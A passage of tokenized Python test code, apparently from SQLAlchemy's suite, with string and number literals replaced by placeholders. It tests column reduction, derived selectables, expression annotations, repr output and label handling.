MetaData ( ) <EOL> employee = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:name>' , String ( <NUM_LIT:100> ) ) , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> ) <EOL> engineer = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , <EOL> ForeignKey ( '<STR_LIT>' ) , primary_key = True ) ) <EOL> eq_ ( util . column_set ( employee . join ( engineer , employee . c . id <EOL> == engineer . c . id ) . primary_key ) , <EOL> util . column_set ( [ employee . c . id ] ) ) <EOL> eq_ ( util . column_set ( employee . join ( engineer , engineer . c . id <EOL> == employee . c . id ) . primary_key ) , <EOL> util . column_set ( [ employee . c . id ] ) ) <EOL> class ReduceTest ( fixtures . TestBase , AssertsExecutionResults ) : <EOL> def test_reduce ( self ) : <EOL> meta = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , meta , <EOL> Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:30> ) ) ) <EOL> t2 = Table ( <EOL> '<STR_LIT>' , <EOL> meta , <EOL> Column ( <EOL> '<STR_LIT>' , <EOL> Integer , <EOL> ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) , <EOL> Column ( <EOL> '<STR_LIT>' , <EOL> String ( <NUM_LIT:30> ) ) ) <EOL> t3 = Table ( <EOL> '<STR_LIT>' , <EOL> meta , <EOL> Column ( <EOL> '<STR_LIT>' , <EOL> Integer , <EOL> ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) , <EOL> Column ( <EOL> '<STR_LIT>' , <EOL> String ( <NUM_LIT:30> ) ) ) <EOL> eq_ ( util . column_set ( sql_util . reduce_columns ( [ <EOL> t1 . c . t1id , <EOL> t1 . c . t1data , <EOL> t2 . c . t2id , <EOL> t2 . c . t2data , <EOL> t3 . c . t3id , <EOL> t3 . c . t3data , <EOL> ] ) ) , util . column_set ( [ t1 . c . t1id , t1 . c . t1data , t2 . c . t2data , <EOL> t3 . c . t3data ] ) ) <EOL> def test_reduce_selectable ( self ) : <EOL> metadata = MetaData ( ) <EOL> engineers = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) ) <EOL> managers = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) ) <EOL> s = select ( [ engineers , <EOL> managers ] ) . where ( engineers . c . engineer_name <EOL> == managers . c . manager_name ) <EOL> eq_ ( util . column_set ( sql_util . reduce_columns ( list ( s . c ) , s ) ) , <EOL> util . column_set ( [ s . c . engineer_id , s . c . engineer_name , <EOL> s . c . manager_id ] ) ) <EOL> def test_reduce_generation ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT:y>' , Integer ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:z>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:q>' , Integer ) ) <EOL> s1 = select ( [ t1 , t2 ] ) <EOL> s2 = s1 . reduce_columns ( only_synonyms = False ) <EOL> eq_ ( <EOL> set ( s2 . inner_columns ) , <EOL> set ( [ t1 . c . x , t1 . c . y , t2 . c . q ] ) <EOL> ) <EOL> s2 = s1 . reduce_columns ( ) <EOL> eq_ ( <EOL> set ( s2 . inner_columns ) , <EOL> set ( [ t1 . c . x , t1 . c . y , t2 . c . z , t2 . c . q ] ) <EOL> ) <EOL> def test_reduce_only_synonym_fk ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT:y>' , Integer ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:q>' , Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> s1 = select ( [ t1 , t2 ] ) <EOL> s1 = s1 . reduce_columns ( only_synonyms = True ) <EOL> eq_ ( <EOL> set ( s1 . c ) , <EOL> set ( [ s1 . c . x , s1 . c . y , s1 . c . q ] ) <EOL> ) <EOL> def test_reduce_only_synonym_lineage ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT:y>' , Integer ) , <EOL> Column ( '<STR_LIT:z>' , Integer ) <EOL> ) <EOL> s1 = select ( [ t1 ] ) <EOL> s2 = select ( [ t1 , s1 ] ) . where ( t1 . c . x == s1 . c . x ) . where ( s1 . c . y == t1 . c . z ) <EOL> eq_ ( <EOL> set ( s2 . reduce_columns ( ) . inner_columns ) , <EOL> set ( [ t1 . c . x , t1 . c . y , t1 . c . z , s1 . c . y , s1 . c . z ] ) <EOL> ) <EOL> s1 = select ( [ t1 ] ) <EOL> s2 = select ( [ s1 , t1 ] ) . where ( t1 . c . x == s1 . c . x ) . where ( s1 . c . y == t1 . c . z ) <EOL> eq_ ( <EOL> set ( s2 . reduce_columns ( ) . inner_columns ) , <EOL> set ( [ s1 . c . x , t1 . c . y , t1 . c . z , s1 . c . y , s1 . c . z ] ) <EOL> ) <EOL> def test_reduce_aliased_join ( self ) : <EOL> metadata = MetaData ( ) <EOL> people = Table ( <EOL> '<STR_LIT>' , metadata , Column ( <EOL> '<STR_LIT>' , Integer , Sequence ( <EOL> '<STR_LIT>' , optional = True ) , primary_key = True ) , Column ( <EOL> '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) , Column ( <EOL> '<STR_LIT:type>' , String ( <NUM_LIT:30> ) ) ) <EOL> engineers = Table ( <EOL> '<STR_LIT>' , <EOL> metadata , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' <EOL> ) , primary_key = True ) , <EOL> Column ( '<STR_LIT:status>' , String ( <NUM_LIT:30> ) ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) , <EOL> ) <EOL> managers = Table ( <EOL> '<STR_LIT>' , metadata , Column ( <EOL> '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) , Column ( <EOL> '<STR_LIT:status>' , String ( <NUM_LIT:30> ) ) , Column ( <EOL> '<STR_LIT>' , String ( <NUM_LIT:50> ) ) ) <EOL> pjoin = people . outerjoin ( engineers ) . outerjoin ( managers ) . select ( use_labels = True ) . alias ( '<STR_LIT>' <EOL> ) <EOL> eq_ ( util . column_set ( sql_util . reduce_columns ( [ pjoin . c . people_person_id , <EOL> pjoin . c . engineers_person_id , <EOL> pjoin . c . managers_person_id ] ) ) , <EOL> util . column_set ( [ pjoin . c . people_person_id ] ) ) <EOL> def test_reduce_aliased_union ( self ) : <EOL> metadata = MetaData ( ) <EOL> item_table = Table ( <EOL> '<STR_LIT>' , <EOL> metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) , <EOL> Column ( <EOL> '<STR_LIT>' , <EOL> Integer , <EOL> default = <NUM_LIT:0> ) ) <EOL> base_item_table = Table ( <EOL> '<STR_LIT>' , metadata , Column ( <EOL> '<STR_LIT:id>' , Integer , primary_key = True ) , Column ( <EOL> '<STR_LIT>' , String ( <NUM_LIT:255> ) , default = None ) ) <EOL> from sqlalchemy . orm . util import polymorphic_union <EOL> item_join = polymorphic_union ( { <EOL> '<STR_LIT>' : <EOL> base_item_table . select ( <EOL> base_item_table . c . child_name <EOL> == '<STR_LIT>' ) , <EOL> '<STR_LIT>' : base_item_table . join ( item_table ) } , <EOL> None , '<STR_LIT>' ) <EOL> eq_ ( util . column_set ( sql_util . reduce_columns ( [ item_join . c . id , <EOL> item_join . c . dummy , <EOL> item_join . c . child_name ] ) ) , <EOL> util . column_set ( [ item_join . c . id , <EOL> item_join . c . dummy , <EOL> item_join . c . child_name ] ) ) <EOL> def test_reduce_aliased_union_2 ( self ) : <EOL> metadata = MetaData ( ) <EOL> page_table = Table ( '<STR_LIT>' , metadata , Column ( '<STR_LIT:id>' , Integer , <EOL> primary_key = True ) ) <EOL> magazine_page_table = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT>' , Integer , <EOL> ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) ) <EOL> classified_page_table = Table ( <EOL> '<STR_LIT>' , <EOL> metadata , <EOL> Column ( <EOL> '<STR_LIT>' , <EOL> Integer , <EOL> ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) ) <EOL> pjoin = union ( <EOL> select ( [ <EOL> page_table . c . id , <EOL> magazine_page_table . c . page_id , <EOL> classified_page_table . c . magazine_page_id <EOL> ] ) . <EOL> select_from ( <EOL> page_table . join ( magazine_page_table ) . <EOL> join ( classified_page_table ) ) , <EOL> select ( [ <EOL> page_table . c . id , <EOL> magazine_page_table . c . page_id , <EOL> cast ( null ( ) , Integer ) . label ( '<STR_LIT>' ) <EOL> ] ) . <EOL> select_from ( page_table . join ( magazine_page_table ) ) <EOL> ) . alias ( '<STR_LIT>' ) <EOL> eq_ ( util . column_set ( sql_util . reduce_columns ( <EOL> [ pjoin . c . id , pjoin . c . page_id , pjoin . c . magazine_page_id ] ) ) , util . column_set ( [ pjoin . c . id ] ) ) <EOL> pjoin = union ( select ( [ <EOL> page_table . c . id , <EOL> magazine_page_table . c . page_id , <EOL> cast ( null ( ) , Integer ) . label ( '<STR_LIT>' ) <EOL> ] ) . <EOL> select_from ( page_table . join ( magazine_page_table ) ) , <EOL> select ( [ <EOL> page_table . c . id , <EOL> magazine_page_table . c . page_id , <EOL> classified_page_table . c . magazine_page_id <EOL> ] ) . <EOL> select_from ( page_table . join ( magazine_page_table ) . <EOL> join ( classified_page_table ) ) <EOL> ) . alias ( '<STR_LIT>' ) <EOL> eq_ ( util . column_set ( sql_util . reduce_columns ( <EOL> [ pjoin . c . id , pjoin . c . page_id , pjoin . c . magazine_page_id ] ) ) , util . column_set ( [ pjoin . c . id ] ) ) <EOL> class DerivedTest ( fixtures . TestBase , AssertsExecutionResults ) : <EOL> def test_table ( self ) : <EOL> meta = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , meta , Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:30> ) ) ) <EOL> t2 = Table ( '<STR_LIT>' , meta , Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:30> ) ) ) <EOL> assert t1 . is_derived_from ( t1 ) <EOL> assert not t2 . is_derived_from ( t1 ) <EOL> def test_alias ( self ) : <EOL> meta = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , meta , Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:30> ) ) ) <EOL> t2 = Table ( '<STR_LIT>' , meta , Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:30> ) ) ) <EOL> assert t1 . alias ( ) . is_derived_from ( t1 ) <EOL> assert not t2 . alias ( ) . is_derived_from ( t1 ) <EOL> assert not t1 . is_derived_from ( t1 . alias ( ) ) <EOL> assert not t1 . is_derived_from ( t2 . alias ( ) ) <EOL> def test_select ( self ) : <EOL> meta = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , meta , Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:30> ) ) ) <EOL> t2 = Table ( '<STR_LIT>' , meta , Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:30> ) ) ) <EOL> assert t1 . select ( ) . is_derived_from ( t1 ) <EOL> assert not t2 . select ( ) . is_derived_from ( t1 ) <EOL> assert select ( [ t1 , t2 ] ) . is_derived_from ( t1 ) <EOL> assert t1 . select ( ) . alias ( '<STR_LIT:foo>' ) . is_derived_from ( t1 ) <EOL> assert select ( [ t1 , t2 ] ) . alias ( '<STR_LIT:foo>' ) . is_derived_from ( t1 ) <EOL> assert not t2 . select ( ) . alias ( '<STR_LIT:foo>' ) . is_derived_from ( t1 ) <EOL> class AnnotationsTest ( fixtures . TestBase ) : <EOL> def test_hashing ( self ) : <EOL> t = table ( '<STR_LIT:t>' , column ( '<STR_LIT:x>' ) ) <EOL> a = t . alias ( ) <EOL> s = t . select ( ) <EOL> s2 = a . select ( ) <EOL> for obj in [ <EOL> t , <EOL> t . c . x , <EOL> a , <EOL> s , <EOL> s2 , <EOL> t . c . x > <NUM_LIT:1> , <EOL> ( t . c . x > <NUM_LIT:1> ) . label ( None ) <EOL> ] : <EOL> annot = obj . _annotate ( { } ) <EOL> eq_ ( set ( [ obj ] ) , set ( [ annot ] ) ) <EOL> def test_compare ( self ) : <EOL> t = table ( '<STR_LIT:t>' , column ( '<STR_LIT:x>' ) , column ( '<STR_LIT:y>' ) ) <EOL> x_a = t . c . x . _annotate ( { } ) <EOL> assert t . c . x . compare ( x_a ) <EOL> assert x_a . compare ( t . c . x ) <EOL> assert not x_a . compare ( t . c . y ) <EOL> assert not t . c . y . compare ( x_a ) <EOL> assert ( t . c . x == <NUM_LIT:5> ) . compare ( x_a == <NUM_LIT:5> ) <EOL> assert not ( t . c . y == <NUM_LIT:5> ) . compare ( x_a == <NUM_LIT:5> ) <EOL> s = select ( [ t ] ) <EOL> x_p = s . c . x <EOL> assert not x_a . compare ( x_p ) <EOL> assert not t . c . x . compare ( x_p ) <EOL> x_p_a = x_p . _annotate ( { } ) <EOL> assert x_p_a . compare ( x_p ) <EOL> assert x_p . compare ( x_p_a ) <EOL> assert not x_p_a . compare ( x_a ) <EOL> def test_late_name_add ( self ) : <EOL> from sqlalchemy . schema import Column <EOL> c1 = Column ( Integer ) <EOL> c1_a = c1 . _annotate ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) <EOL> c1 . name = '<STR_LIT>' <EOL> eq_ ( c1_a . name , '<STR_LIT>' ) <EOL> def test_late_table_add ( self ) : <EOL> c1 = Column ( "<STR_LIT:foo>" , Integer ) <EOL> c1_a = c1 . _annotate ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) <EOL> t = Table ( '<STR_LIT:t>' , MetaData ( ) , c1 ) <EOL> is_ ( c1_a . table , t ) <EOL> def test_basic_attrs ( self ) : <EOL> t = Table ( '<STR_LIT:t>' , MetaData ( ) , <EOL> Column ( '<STR_LIT:x>' , Integer , info = { '<STR_LIT:q>' : '<STR_LIT:p>' } ) , <EOL> Column ( '<STR_LIT:y>' , Integer , key = '<STR_LIT:q>' ) ) <EOL> x_a = t . c . x . _annotate ( { } ) <EOL> y_a = t . c . q . _annotate ( { } ) <EOL> t . c . x . info [ '<STR_LIT:z>' ] = '<STR_LIT:h>' <EOL> eq_ ( y_a . key , '<STR_LIT:q>' ) <EOL> is_ ( x_a . table , t ) <EOL> eq_ ( x_a . info , { '<STR_LIT:q>' : '<STR_LIT:p>' , '<STR_LIT:z>' : '<STR_LIT:h>' } ) <EOL> eq_ ( t . c . x . anon_label , x_a . anon_label ) <EOL> def test_custom_constructions ( self ) : <EOL> from sqlalchemy . schema import Column <EOL> class MyColumn ( Column ) : <EOL> def __init__ ( self ) : <EOL> Column . __init__ ( self , '<STR_LIT:foo>' , Integer ) <EOL> _constructor = Column <EOL> t1 = Table ( '<STR_LIT>' , MetaData ( ) , MyColumn ( ) ) <EOL> s1 = t1 . select ( ) <EOL> assert isinstance ( t1 . c . foo , MyColumn ) <EOL> assert isinstance ( s1 . c . foo , Column ) <EOL> annot_1 = t1 . c . foo . _annotate ( { } ) <EOL> s2 = select ( [ annot_1 ] ) <EOL> assert isinstance ( s2 . c . foo , Column ) <EOL> annot_2 = s1 . _annotate ( { } ) <EOL> assert isinstance ( annot_2 . c . foo , Column ) <EOL> def test_custom_construction_correct_anno_subclass ( self ) : <EOL> from sqlalchemy . schema import Column <EOL> from sqlalchemy . sql . elements import AnnotatedColumnElement <EOL> class MyColumn ( Column ) : <EOL> pass <EOL> assert isinstance ( <EOL> MyColumn ( '<STR_LIT:x>' , Integer ) . _annotate ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) , <EOL> AnnotatedColumnElement ) <EOL> def test_custom_construction_correct_anno_expr ( self ) : <EOL> from sqlalchemy . schema import Column <EOL> class MyColumn ( Column ) : <EOL> pass <EOL> col = MyColumn ( '<STR_LIT:x>' , Integer ) <EOL> binary_1 = col == <NUM_LIT:5> <EOL> col_anno = MyColumn ( '<STR_LIT:x>' , Integer ) . _annotate ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) <EOL> binary_2 = col_anno == <NUM_LIT:5> <EOL> eq_ ( binary_2 . left . _annotations , { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) <EOL> def test_annotated_corresponding_column ( self ) : <EOL> table1 = table ( '<STR_LIT>' , column ( "<STR_LIT>" ) ) <EOL> s1 = select ( [ table1 . c . col1 ] ) <EOL> t1 = s1 . _annotate ( { } ) <EOL> t2 = s1 <EOL> assert t1 . c is t2 . c <EOL> assert t1 . c . col1 is t2 . c . col1 <EOL> inner = select ( [ s1 ] ) <EOL> assert inner . corresponding_column ( <EOL> t2 . c . col1 , <EOL> require_embedded = False ) is inner . corresponding_column ( <EOL> t2 . c . col1 , <EOL> require_embedded = True ) is inner . c . col1 <EOL> assert inner . corresponding_column ( <EOL> t1 . c . col1 , <EOL> require_embedded = False ) is inner . corresponding_column ( <EOL> t1 . c . col1 , <EOL> require_embedded = True ) is inner . c . col1 <EOL> def test_annotated_visit ( self ) : <EOL> table1 = table ( '<STR_LIT>' , column ( "<STR_LIT>" ) , column ( "<STR_LIT>" ) ) <EOL> bin = table1 . c . col1 == bindparam ( '<STR_LIT:foo>' , value = None ) <EOL> assert str ( bin ) == "<STR_LIT>" <EOL> def visit_binary ( b ) : <EOL> b . right = table1 . c . col2 <EOL> b2 = visitors . cloned_traverse ( bin , { } , { '<STR_LIT>' : visit_binary } ) <EOL> assert str ( b2 ) == "<STR_LIT>" <EOL> b3 = visitors . cloned_traverse ( bin . _annotate ( { } ) , { } , { '<STR_LIT>' : <EOL> visit_binary } ) <EOL> assert str ( b3 ) == '<STR_LIT>' <EOL> def visit_binary ( b ) : <EOL> b . left = bindparam ( '<STR_LIT:bar>' ) <EOL> b4 = visitors . cloned_traverse ( b2 , { } , { '<STR_LIT>' : visit_binary } ) <EOL> assert str ( b4 ) == "<STR_LIT>" <EOL> b5 = visitors . cloned_traverse ( b3 , { } , { '<STR_LIT>' : visit_binary } ) <EOL> assert str ( b5 ) == "<STR_LIT>" <EOL> def test_label_accessors ( self ) : <EOL> t1 = table ( '<STR_LIT>' , column ( '<STR_LIT>' ) ) <EOL> l1 = t1 . c . c1 . label ( None ) <EOL> is_ ( l1 . _order_by_label_element , l1 ) <EOL> l1a = l1 . _annotate ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) <EOL> is_ ( l1a . _order_by_label_element , l1a ) <EOL> def test_annotate_aliased ( self ) : <EOL> t1 = table ( '<STR_LIT>' , column ( '<STR_LIT>' ) ) <EOL> s = select ( [ ( t1 . c . c1 + <NUM_LIT:3> ) . label ( '<STR_LIT>' ) ] ) <EOL> a = s . alias ( ) <EOL> a = sql_util . _deep_annotate ( a , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) <EOL> eq_ ( a . _annotations [ '<STR_LIT:foo>' ] , '<STR_LIT:bar>' ) <EOL> eq_ ( a . element . _annotations [ '<STR_LIT:foo>' ] , '<STR_LIT:bar>' ) <EOL> def test_annotate_expressions ( self ) : <EOL> table1 = table ( '<STR_LIT>' , column ( '<STR_LIT>' ) , column ( '<STR_LIT>' ) ) <EOL> for expr , expected in [ ( table1 . c . col1 , '<STR_LIT>' ) , <EOL> ( table1 . c . col1 == <NUM_LIT:5> , <EOL> '<STR_LIT>' ) , <EOL> ( table1 . c . col1 . in_ ( [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ] : <EOL> eq_ ( str ( expr ) , expected ) <EOL> eq_ ( str ( expr . _annotate ( { } ) ) , expected ) <EOL> eq_ ( str ( sql_util . _deep_annotate ( expr , { } ) ) , expected ) <EOL> eq_ ( str ( sql_util . _deep_annotate ( <EOL> expr , { } , exclude = [ table1 . c . col1 ] ) ) , expected ) <EOL> def test_deannotate ( self ) : <EOL> table1 = table ( '<STR_LIT>' , column ( "<STR_LIT>" ) , column ( "<STR_LIT>" ) ) <EOL> bin = table1 . c . col1 == bindparam ( '<STR_LIT:foo>' , value = None ) <EOL> b2 = sql_util . _deep_annotate ( bin , { '<STR_LIT>' : True } ) <EOL> b3 = sql_util . _deep_deannotate ( b2 ) <EOL> b4 = sql_util . _deep_deannotate ( bin ) <EOL> for elem in ( b2 . _annotations , b2 . left . _annotations ) : <EOL> assert '<STR_LIT>' in elem <EOL> for elem in b3 . _annotations , b3 . left . _annotations , b4 . _annotations , b4 . left . _annotations : <EOL> assert elem == { } <EOL> assert b2 . left is not bin . left <EOL> assert b3 . left is not b2 . left is not bin . left <EOL> assert b4 . left is bin . left <EOL> assert bin . right is not b2 . right is not b3 . right is not b4 . right <EOL> def test_annotate_unique_traversal ( self ) : <EOL> """<STR_LIT>""" <EOL> table1 = table ( '<STR_LIT>' , column ( '<STR_LIT:x>' ) ) <EOL> table2 = table ( '<STR_LIT>' , column ( '<STR_LIT:y>' ) ) <EOL> a1 = table1 . alias ( ) <EOL> s = select ( [ a1 . c . x ] ) . select_from ( <EOL> a1 . join ( table2 , a1 . c . x == table2 . c . y ) <EOL> ) <EOL> for sel in ( <EOL> sql_util . _deep_deannotate ( s ) , <EOL> visitors . cloned_traverse ( s , { } , { } ) , <EOL> visitors . replacement_traverse ( s , { } , lambda x : None ) <EOL> ) : <EOL> assert sel . _raw_columns [ <NUM_LIT:0> ] . table is a1 <EOL> assert sel . _froms [ <NUM_LIT:0> ] is sel . _froms [ <NUM_LIT:1> ] . left <EOL> eq_ ( str ( s ) , str ( sel ) ) <EOL> for sel in ( <EOL> sql_util . _deep_deannotate ( s , { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) , <EOL> sql_util . _deep_annotate ( s , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) , <EOL> ) : <EOL> assert sel . _froms [ <NUM_LIT:0> ] is not sel . _froms [ <NUM_LIT:1> ] . left <EOL> eq_ ( str ( s ) , str ( sel ) ) <EOL> def test_annotate_varied_annot_same_col ( self ) : <EOL> """<STR_LIT>""" <EOL> t1 = table ( '<STR_LIT>' , column ( "<STR_LIT>" ) , column ( "<STR_LIT>" ) ) <EOL> s = select ( [ t1 . c . col1 . _annotate ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) ] ) <EOL> s2 = select ( [ t1 . c . col1 . _annotate ( { "<STR_LIT>" : "<STR_LIT>" } ) ] ) <EOL> s3 = s . union ( s2 ) <EOL> sel = sql_util . _deep_annotate ( s3 , { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> eq_ ( <EOL> sel . selects [ <NUM_LIT:0> ] . _raw_columns [ <NUM_LIT:0> ] . _annotations , <EOL> { "<STR_LIT:foo>" : "<STR_LIT:bar>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> ) <EOL> eq_ ( <EOL> sel . selects [ <NUM_LIT:1> ] . _raw_columns [ <NUM_LIT:0> ] . _annotations , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> ) <EOL> def test_deannotate_2 ( self ) : <EOL> table1 = table ( '<STR_LIT>' , column ( "<STR_LIT>" ) , column ( "<STR_LIT>" ) ) <EOL> j = table1 . c . col1 . _annotate ( { "<STR_LIT>" : True } ) == table1 . c . col2 . _annotate ( { "<STR_LIT>" : True } ) <EOL> j2 = sql_util . _deep_deannotate ( j ) <EOL> eq_ ( <EOL> j . left . _annotations , { "<STR_LIT>" : True } <EOL> ) <EOL> eq_ ( <EOL> j2 . left . _annotations , { } <EOL> ) <EOL> def test_deannotate_3 ( self ) : <EOL> table1 = table ( '<STR_LIT>' , column ( "<STR_LIT>" ) , column ( "<STR_LIT>" ) , <EOL> column ( "<STR_LIT>" ) , column ( "<STR_LIT>" ) ) <EOL> j = and_ ( <EOL> table1 . c . col1 . _annotate ( { "<STR_LIT>" : True } ) == <EOL> table1 . c . col2 . _annotate ( { "<STR_LIT>" : True } ) , <EOL> table1 . c . col3 . _annotate ( { "<STR_LIT>" : True } ) == <EOL> table1 . c . col4 . _annotate ( { "<STR_LIT>" : True } ) <EOL> ) <EOL> j2 = sql_util . _deep_deannotate ( j ) <EOL> eq_ ( <EOL> j . clauses [ <NUM_LIT:0> ] . left . _annotations , { "<STR_LIT>" : True } <EOL> ) <EOL> eq_ ( <EOL> j2 . clauses [ <NUM_LIT:0> ] . left . _annotations , { } <EOL> ) <EOL> def test_annotate_fromlist_preservation ( self ) : <EOL> """<STR_LIT>""" <EOL> table1 = table ( '<STR_LIT>' , column ( '<STR_LIT:x>' ) ) <EOL> table2 = table ( '<STR_LIT>' , column ( '<STR_LIT:y>' ) ) <EOL> a1 = table1 . alias ( ) <EOL> s = select ( [ a1 . c . x ] ) . select_from ( <EOL> a1 . join ( table2 , a1 . c . x == table2 . c . y ) <EOL> ) <EOL> assert_s = select ( [ select ( [ s ] ) ] ) <EOL> for fn in ( <EOL> sql_util . _deep_deannotate , <EOL> lambda s : sql_util . _deep_annotate ( s , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) , <EOL> lambda s : visitors . cloned_traverse ( s , { } , { } ) , <EOL> lambda s : visitors . replacement_traverse ( s , { } , lambda x : None ) <EOL> ) : <EOL> sel = fn ( select ( [ fn ( select ( [ fn ( s ) ] ) ) ] ) ) <EOL> eq_ ( str ( assert_s ) , str ( sel ) ) <EOL> def test_bind_unique_test ( self ) : <EOL> table ( '<STR_LIT:t>' , column ( '<STR_LIT:a>' ) , column ( '<STR_LIT:b>' ) ) <EOL> b = bindparam ( "<STR_LIT>" , value = "<STR_LIT:x>" , unique = True ) <EOL> eq_ ( str ( or_ ( b , b . _annotate ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) ) ) , <EOL> "<STR_LIT>" ) <EOL> def test_comparators_cleaned_out_construction ( self ) : <EOL> c = column ( '<STR_LIT:a>' ) <EOL> comp1 = c . comparator <EOL> c1 = c . _annotate ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) <EOL> comp2 = c1 . comparator <EOL> assert comp1 is not comp2 <EOL> def test_comparators_cleaned_out_reannotate ( self ) : <EOL> c = column ( '<STR_LIT:a>' ) <EOL> c1 = c . _annotate ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) <EOL> comp1 = c1 . comparator <EOL> c2 = c1 . _annotate ( { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> comp2 = c2 . comparator <EOL> assert comp1 is not comp2 <EOL> def test_comparator_cleanout_integration ( self ) : <EOL> c = column ( '<STR_LIT:a>' ) <EOL> c1 = c . _annotate ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) <EOL> comp1 = c1 . comparator <EOL> c2 = c1 . _annotate ( { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> comp2 = c2 . comparator <EOL> assert ( c2 == <NUM_LIT:5> ) . left . _annotations == { "<STR_LIT:foo>" : "<STR_LIT:bar>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> class ReprTest ( fixtures . TestBase ) : <EOL> def test_ensure_repr_elements ( self ) : <EOL> for obj in [ <EOL> elements . Cast ( <NUM_LIT:1> , <NUM_LIT:2> ) , <EOL> elements . TypeClause ( String ( ) ) , <EOL> elements . ColumnClause ( '<STR_LIT:x>' ) , <EOL> elements . BindParameter ( '<STR_LIT:q>' ) , <EOL> elements . Null ( ) , <EOL> elements . True_ ( ) , <EOL> elements . False_ ( ) , <EOL> elements . ClauseList ( ) , <EOL> elements . BooleanClauseList . and_ ( ) , <EOL> elements . Tuple ( ) , <EOL> elements . Case ( [ ] ) , <EOL> elements . Extract ( '<STR_LIT:foo>' , column ( '<STR_LIT:x>' ) ) , <EOL> elements . UnaryExpression ( column ( '<STR_LIT:x>' ) ) , <EOL> elements . Grouping ( column ( '<STR_LIT:x>' ) ) , <EOL> elements . Over ( func . foo ( ) ) , <EOL> elements . Label ( '<STR_LIT:q>' , column ( '<STR_LIT:x>' ) ) , <EOL> ] : <EOL> repr ( obj ) <EOL> class WithLabelsTest ( fixtures . TestBase ) : <EOL> def _assert_labels_warning ( self , s ) : <EOL> assert_raises_message ( <EOL> exc . SAWarning , <EOL> r"<STR_LIT>" , <EOL> lambda : s . c <EOL> ) <EOL> def _assert_result_keys ( self , s , keys ) : <EOL> compiled = s . compile ( ) <EOL> eq_ ( set ( compiled . _create_result_map ( ) ) , set ( keys ) ) <EOL> def _assert_subq_result_keys ( self , s , keys ) : <EOL> compiled = s . select ( ) . compile ( ) <EOL> eq_ ( set ( compiled . _create_result_map ( ) ) , set ( keys ) ) <EOL> 